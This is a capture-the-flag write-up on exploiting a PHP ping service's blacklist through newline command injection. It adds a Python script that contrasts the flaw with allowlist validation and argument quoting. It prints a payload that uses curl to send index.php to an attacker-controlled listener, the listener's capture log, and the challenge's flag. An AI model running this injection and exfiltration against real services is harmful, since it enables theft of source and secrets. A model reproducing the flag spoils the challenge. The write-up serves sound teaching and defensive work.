Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.
The service has two results: Ping OK or Ping NOK.
Common connectors:
&   : the command after it runs regardless of whether the one before it succeeded (the first is sent to the background)
&&  : if the command before it fails, the command after it is not executed
|   : both sides run regardless of the result; the output of the first becomes the input of the second
||  : if the command before it succeeds, the command after it is not executed
All of these are stripped by the filter, but the newline (%0A) is still available as a command separator.
Here `sleep 60` is appended after the newline to check whether the statement following it is executed (the `timeout 5` wrapper kills it after 5 seconds, but the delayed response is still observable).
Then curl is used to send index.php out to a listener on the VPS:
payload: ip=127.0.0.1%0acurl -F filename=@index.php *.*.*.*:9999   (where *.*.*.* is the VPS IP address)
nc -lvvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from challenge01.root-me.org 49010 received!
POST / HTTP/1.1
Host: *.*.*.*:9999
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 1008
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------0fee3a45749c037a
--------------------------0fee3a45749c037a
Content-Disposition: form-data; name="filename"; filename="index.php"
Content-Type: application/octet-stream
<html>
<head>
<title>Ping Service</title>
</head>
<body>
<form method="POST" action="index.php">
<input type="text" name="ip" placeholder="127.0.0.1">
<input type="submit">
</form>
<pre>
<?php
$flag = "Comma@nd_1nJec7ion_Fl@9_1337_Th3_G@m3!!!";
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
    $ip = @preg_replace("/[\\\$|`;&<>]/", "", $_POST["ip"]);
    $response = @shell_exec("timeout 5 bash -c 'ping -c 3 ".$ip."'");
    $receive = @preg_match("/3 packets transmitted, (.*) received/s",$response,$out);
    if ($out[1]=="3")
    {
        echo "Ping OK";
    }
    elseif ($out[1]=="0")
    {
        echo "Ping NOK";
    }
    else
    {
        echo "Syntax Error";
    }
}
?>
</pre>
</body>
</html>
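The root cause visible in the recovered index.php is a blacklist: preg_replace() strips `$ | ` ; & < >` but not the newline, and the stripped value is still spliced into a `bash -c '...'` string. The following Python script is an added example, not part of this writeup or of the challenge: it transcribes that blacklist, shows that the newline payload above passes through it untouched, and contrasts it with an allowlist validator plus argument quoting (the equivalent of PHP's filter_var() with FILTER_VALIDATE_IP and escapeshellarg()). The attacker host is an obviously labelled placeholder and the function names are my own.

```python
import ipaddress
import re
import shlex

# The challenge's blacklist, transcribed from index.php above.
# PHP's "/[\\\$|`;&<>]/" becomes the character class [$|`;&<>] once
# PHP string escaping is resolved; the backslash itself is not stripped.
BLACKLIST = re.compile(r"[$|`;&<>]")

# Placeholder for the attacker-controlled host the writeup redacts as "*.*.*.*".
ATTACKER_HOST = "ATTACKER_IP_PLACEHOLDER"


def blacklist_filter(ip: str) -> str:
    """Replicates the preg_replace() in index.php: strip blacklisted bytes."""
    return BLACKLIST.sub("", ip)


def vulnerable_command(ip: str) -> str:
    """The command string index.php builds after the blacklist (never executed here)."""
    return "timeout 5 bash -c 'ping -c 3 " + blacklist_filter(ip) + "'"


def is_valid_ipv4(ip: str) -> bool:
    """Allowlist check: exactly one dotted quad and nothing else.

    re.fullmatch is used instead of ^...$ because `$` (in Python, and in
    PCRE without the D modifier) also matches just before a trailing
    newline, which is precisely the byte this challenge abuses.
    """
    if not re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", ip):
        return False
    try:
        ipaddress.IPv4Address(ip)  # rejects octets above 255
    except ValueError:
        return False
    return True


def hardened_command(ip: str) -> str:
    """Build the ping command only for validated input, and quote it anyway.

    shlex.quote plays the role of PHP's escapeshellarg(): even if the
    validation were loosened later, the argument can no longer break out
    of its quoting, and the bash -c wrapper is dropped entirely.
    """
    if not is_valid_ipv4(ip):
        raise ValueError("rejected: not a single IPv4 address")
    return "timeout 5 ping -c 3 " + shlex.quote(ip)


def injection_indicators(ip: str) -> list:
    """Defensive logging helper: name the shell metacharacters present in a
    submitted value, including the ones the original blacklist misses."""
    names = {
        "\n": "newline", "\r": "carriage-return", "$": "dollar", "|": "pipe",
        "`": "backtick", ";": "semicolon", "&": "ampersand",
        "'": "single-quote", "(": "paren", ")": "paren",
    }
    return sorted({names[c] for c in ip if c in names})


if __name__ == "__main__":
    # Constructed inputs: the writeup's payload with the host redacted, and a
    # classic semicolon attempt that the blacklist does catch.
    payload = "127.0.0.1\ncurl -F filename=@index.php " + ATTACKER_HOST + ":9999"
    for candidate in ("127.0.0.1", "127.0.0.1; id", payload):
        print(repr(candidate))
        print("  after blacklist :", repr(blacklist_filter(candidate)))
        print("  allowlist ok    :", is_valid_ipv4(candidate))
        print("  indicators      :", injection_indicators(candidate))
```

One caveat when porting the allowlist back to PHP as a regex: without the D modifier, `$` matches before a final newline, so `/^\d{1,3}(\.\d{1,3}){3}$/` would still accept `127.0.0.1\n`. filter_var() with FILTER_VALIDATE_IP does not have that problem and is the simpler choice; whichever is used, the validated value should still go through escapeshellarg() rather than into a `bash -c` string.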